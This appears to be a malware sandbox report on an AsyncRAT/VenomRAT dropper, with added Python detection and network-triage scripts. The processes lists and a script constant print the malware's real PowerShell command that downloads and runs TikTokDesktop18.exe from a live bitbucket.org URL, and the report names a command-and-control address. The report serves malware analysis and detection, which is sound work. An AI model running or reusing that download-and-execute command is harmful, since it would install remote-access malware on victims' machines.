Analysis Overview
SHA256
017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1
Threat Level: Known bad
The file 017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Asyncrat family
VenomRAT
Venomrat family
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
Command and Scripting Interpreter: PowerShell
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Unsigned PE
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-28 21:59
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-28 21:59
Reported
2024-11-28 22:01
Platform
win7-20240903-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe
"C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\141D.tmp\141E.tmp\141F.bat C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\141D.tmp\141E.tmp\141F.bat
| MD5 | 1904675eec0f302424c4bde0956dab54 |
| SHA1 | 267c3174e35e0e2a7d104f98b3326f313f2e464e |
| SHA256 | 45fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6 |
| SHA512 | fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3 |
memory/2720-6-0x000007FEF646E000-0x000007FEF646F000-memory.dmp
memory/2720-7-0x000000001B700000-0x000000001B9E2000-memory.dmp
memory/2720-9-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp
memory/2720-8-0x0000000001DB0000-0x0000000001DB8000-memory.dmp
memory/2720-10-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp
memory/2720-11-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp
memory/2720-12-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-28 21:59
Reported
2024-11-28 22:02
Platform
win10v2004-20241007-en
Max time kernel
102s
Max time network
119s
Command Line
Signatures
AsyncRat
Asyncrat family
VenomRAT
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Venomrat family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2080 set thread context of 4500 | N/A | C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe
"C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A894.tmp\A895.tmp\A896.bat C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;
C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe
C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe ;
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
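The two Processes lists above (behavioral1 and behavioral2) and the SetThreadContext row show one chain: a batch file in Temp runs PowerShell, PowerShell pulls TikTokDesktop18.exe from bitbucket.org into Temp, the dropped file runs and then starts MSBuild.exe with no arguments and sets its thread context, which is the shape of process hollowing. The detection logic below is an added example, not sandbox output and not code from the malware; it runs over constructed Sysmon-style process-creation records. Image paths and command lines are copied from the report and PIDs 2080 and 4500 come from the SetThreadContext row; the other PIDs, the parent/child links, the benign control events and the extra hollowing hosts in `HOLLOW_HOSTS` are assumptions.

```python
"""Detection logic for the execution chain in the Processes lists above,
run over constructed Sysmon-style process-creation records.

Added example: not sandbox output and not code from the malware. Image paths
and command lines come from the report, as do PIDs 2080/4500; the other PIDs,
the parent/child links and the two benign control events are assumed.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# File-hosting service seen in the report. Extending this set to other hosts
# your environment treats as download stages is a site-specific assumption.
HOSTING_DOMAINS = {"bitbucket.org"}
# .NET utilities that loaders commonly hollow. MSBuild.exe is the one in the
# SetThreadContext row; the others are assumed additions.
HOLLOW_HOSTS = {"msbuild.exe", "regasm.exe", "regsvcs.exe",
                "installutil.exe", "applaunch.exe"}

URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)
WIN_PATH_RE = re.compile(r"[A-Za-z]:\\[^'\"\s;]+")
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(path: str) -> str:
    return path.rstrip('"').rsplit("\\", 1)[-1].lower()


def download_stage(ev: ProcEvent):
    """(host, dest_path) when powershell.exe fetches from an abused hosting
    service into the user's Temp directory, else None."""
    if basename(ev.image) != "powershell.exe":
        return None
    hosts = {urlparse(u).hostname.lower()
             for u in URL_RE.findall(ev.cmdline) if urlparse(u).hostname}
    dests = [p for p in WIN_PATH_RE.findall(ev.cmdline) if TEMP_RE.search(p)]
    hit = hosts & HOSTING_DOMAINS
    if hit and dests:
        return sorted(hit)[0], dests[0]
    return None


def hollow_candidate(ev: ProcEvent, parent: ProcEvent) -> bool:
    """True when a hollowing-prone .NET utility starts with no arguments and
    its parent runs from Temp: the shape of the SetThreadContext row above."""
    if basename(ev.image) not in HOLLOW_HOSTS:
        return False
    rest = ev.cmdline.replace(f'"{ev.image}"', "").replace(ev.image, "").strip()
    return rest == "" and bool(TEMP_RE.search(parent.image))


def analyze(events):
    """Correlate the two stages. A 'download_then_hollow' finding means the
    file PowerShell pulled from the hosting service is the parent that
    started the empty .NET host."""
    by_pid = {e.pid: e for e in events}
    downloads = {}  # basename of the dropped file -> PID of the downloader
    findings = []
    for ev in events:
        stage = download_stage(ev)
        if stage:
            host, dest = stage
            downloads[basename(dest)] = ev.pid
            findings.append(("download_from_hosting_service", ev.pid, host, basename(dest)))
    for ev in events:
        parent = by_pid.get(ev.ppid)
        if parent is None or not hollow_candidate(ev, parent):
            continue
        findings.append(("hollow_candidate", parent.pid, ev.pid, basename(ev.image)))
        downloader = downloads.get(basename(parent.image))
        if downloader is not None:
            findings.append(("download_then_hollow", downloader, parent.pid, ev.pid))
    return findings


SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"
DROPPED = r"C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\system32\cmd.exe"
BAT = r"C:\Users\Admin\AppData\Local\Temp\A894.tmp\A895.tmp\A896.bat"
DOWNLOAD_CMD = ('powershell /nop /com "(New-Object Net.WebClient).DownloadFile('
                "'https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', "
                r"'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')" '";')

# Constructed events mirroring the behavioral2 Processes list; PIDs other
# than 2080/4500 are assumed.
EVENTS = [
    ProcEvent(1000, 600, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(1100, 1000, CMD, f'"C:\\Windows\\sysnative\\cmd" /c "{BAT} {SAMPLE}"'),
    ProcEvent(4408, 1100, PS, DOWNLOAD_CMD),
    ProcEvent(1200, 1100, CMD, f"cmd.exe /c {DROPPED};"),
    ProcEvent(2080, 1200, DROPPED, f"{DROPPED} ;"),
    ProcEvent(4500, 2080, MSBUILD, f'"{MSBUILD}"'),
    # Constructed benign controls: a developer build and an internal download.
    ProcEvent(5000, 4900, MSBUILD, f'"{MSBUILD}" C:\\src\\app.csproj /t:Build'),
    ProcEvent(5100, 4900, PS,
              'powershell -c "(New-Object Net.WebClient).DownloadFile('
              "'https://intranet.example/tool.exe', "
              r"'C:\Users\Admin\AppData\Local\Temp\tool.exe')" '"'),
]

if __name__ == "__main__":
    for finding in analyze(EVENTS):
        print(finding)
```

The host gate in `download_stage` is what keeps the rule quiet on ordinary PowerShell downloads, and the empty-argument check in `hollow_candidate` is what separates the hollowed MSBuild.exe from a real build, which always carries a project path or switches; the two benign control events exercise both.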
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 16.15.178.155:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 23.142.166.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.178.15.16.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | N/A | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | N/A | tcp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | N/A | tcp |
| RU | 212.15.49.155:4449 | N/A | tcp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | N/A | tcp |
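Most rows in the Network table above are resolver traffic: two forward lookups for the download stage and ten reverse (in-addr.arpa) lookups the sandbox host issued for addresses it touched. What remains is two HTTPS connections to named hosts (the Bitbucket download) and five TCP connections straight to 212.15.49.155:4449 with no name in front of them, which is the RAT's command-and-control. The triage script below is an added example, not part of the sandbox report: it parses the rows as printed on this page, strips the resolver noise, lists what was actually contacted and surfaces repeated direct-to-IP connections as beacon candidates. The `min_hits` threshold and the class labels are editorial assumptions.

```python
"""Triage of the Network table above: strip resolver and reverse-DNS noise,
list the hosts actually contacted, and surface beacon candidates.

Added example, not part of the sandbox report. ROWS reproduces the table rows
from this page; the min_hits threshold and the class labels are assumptions.
"""
from collections import Counter
from dataclasses import dataclass

ROWS = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 16.15.178.155:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 23.142.166.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.178.15.16.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | N/A | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | N/A | tcp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | N/A | tcp |
| RU | 212.15.49.155:4449 | N/A | tcp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | N/A | tcp |
"""


@dataclass(frozen=True)
class Conn:
    country: str
    ip: str
    port: int
    domain: str
    proto: str


def parse_rows(text: str):
    """Parse the pipe-delimited rows; an empty or N/A domain becomes ''."""
    conns = []
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) < 4 or cells[0] == "Country":
            continue
        country, dest, domain, proto = cells[:4]
        ip, _, port = dest.rpartition(":")
        conns.append(Conn(country, ip, int(port),
                          "" if domain in ("", "N/A") else domain, proto.lower()))
    return conns


def classify(c: Conn) -> str:
    if c.port == 53 and c.proto == "udp":
        return "ptr_lookup" if c.domain.endswith(".in-addr.arpa") else "dns_lookup"
    return "named_host" if c.domain else "direct_ip"


def ptr_to_ip(name: str) -> str:
    """28.118.140.52.in-addr.arpa -> 52.140.118.28"""
    octets = name[: -len(".in-addr.arpa")].split(".")
    return ".".join(reversed(octets))


def summarize(conns):
    return dict(Counter(classify(c) for c in conns))


def contacted(conns):
    """(ip, port, domain) triples that carried traffic, resolver queries excluded."""
    return sorted({(c.ip, c.port, c.domain) for c in conns
                   if classify(c) in ("named_host", "direct_ip")})


def ptr_targets(conns):
    """Addresses the sandbox reverse-resolved; the C2 address is not among them."""
    return sorted({ptr_to_ip(c.domain) for c in conns if classify(c) == "ptr_lookup"})


def beacon_candidates(conns, min_hits=2):
    """Direct-to-IP TCP connections repeated on the same ip:port with no name
    resolution in front of them: the C2 shape of the 4449 rows above."""
    hits = Counter((c.ip, c.port) for c in conns
                   if classify(c) == "direct_ip" and c.proto == "tcp")
    return [(ip, port, n) for (ip, port), n in sorted(hits.items()) if n >= min_hits]


CONNS = parse_rows(ROWS)

if __name__ == "__main__":
    print(summarize(CONNS))
    print(contacted(CONNS))
    print(beacon_candidates(CONNS))
```

Reversing the in-addr.arpa names recovers the addresses behind the PTR noise, and two of them (185.166.142.23 and 16.15.178.155) are the Bitbucket and S3 endpoints already in the table, so they add nothing; the address that matters, 212.15.49.155, is the one with neither a forward lookup nor a reverse lookup, which is typical of a RAT with its server hardcoded as an IP.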
Files
C:\Users\Admin\AppData\Local\Temp\A894.tmp\A895.tmp\A896.bat
| MD5 | 1904675eec0f302424c4bde0956dab54 |
| SHA1 | 267c3174e35e0e2a7d104f98b3326f313f2e464e |
| SHA256 | 45fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6 |
| SHA512 | fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3 |
memory/4408-2-0x00007FFE71FB3000-0x00007FFE71FB5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_snvlrfet.khw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4408-8-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp
memory/4408-13-0x00000220FF450000-0x00000220FF472000-memory.dmp
memory/4408-14-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp
memory/4408-18-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe
| MD5 | e619fff5751a713cf445da24a7a12c94 |
| SHA1 | 9fc67a572c69158541aaaab0264607ada70a408c |
| SHA256 | 11fbd295494309d56d775a11f805544737ce71d058a716194c0fd5b800cdc6d9 |
| SHA512 | 07420c9a0336ae350567abf68d7f5ef52b34c4c010dbabae6693bf27fd5a50a8b2b16696a3bed7bdc846d542eb04ce6102d5387484f352f9d09c8789ccfcd9ae |
memory/2080-22-0x000000007411E000-0x000000007411F000-memory.dmp
memory/2080-23-0x00000000005C0000-0x0000000000646000-memory.dmp
memory/2080-24-0x0000000002950000-0x0000000002956000-memory.dmp
memory/2080-25-0x000000000ABE0000-0x000000000B10C000-memory.dmp
C:\Users\Admin\AppData\Roaming\gdi32.dll
| MD5 | 8d662564d514751028c65d96c696271f |
| SHA1 | 8e27943b7b901a808d39a7ee6977e1d3769a15fb |
| SHA256 | 86af5d6ee9d824ec2dfa73f44b9ae285d33e9748a8b6dbd4333d1ae06cf6f72b |
| SHA512 | 0a5460bbe7f43db560a08e508381613098a28de208a9d85c9c41fffa62b1e0299389a575dfa2b78767d3dd0fc73f0c88677ca32d7fe4e87698def1386cf35bef |
memory/4500-32-0x0000000000780000-0x00000000007AC000-memory.dmp
memory/4500-34-0x0000000005670000-0x0000000005C14000-memory.dmp
memory/4500-36-0x0000000005370000-0x0000000005402000-memory.dmp
memory/4500-37-0x0000000005350000-0x000000000535A000-memory.dmp